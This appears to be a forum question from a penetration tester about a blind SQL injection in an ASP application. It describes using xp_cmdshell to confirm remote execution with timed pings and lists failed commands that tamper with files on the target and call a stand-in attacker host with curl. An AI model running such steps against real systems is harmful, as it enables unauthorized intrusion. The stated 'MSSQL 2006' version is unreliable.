5Nis
xp_cmdshell as dbo user only able to run ‘ping localhost’ to verify RCE?
I am doing a pentest on a client's ASP web application and I have identified a blind SQL injection. However, after enabling xp_cmdshell, I am only able to run the ping localhost command to verify the RCE, which has a 3-second delay. I also tried to run ping -n 10 localhost and it has a ~10s delay as well.
I am fairly certain that there is a RCE here but I can't seem to run other commands such as:
mkdir C:\Windows\Temp\pwnedmkdir C:\inetpub\wwwroot\pwneddel C:\Windows\Temp\randomFilemove C:\Windows\Temp\randomFile C:\Windows\Temp\randomFile2curl http://attackerIP:80(blocked by firewall)
I also managed to extract the username using the SELECT CURRENT_USER; command using the blind SQL vulnerability and it is dbo. The database version is MSSQL 2006.
What are some possible reasons that I am only able to run the ping localhost command and not others?
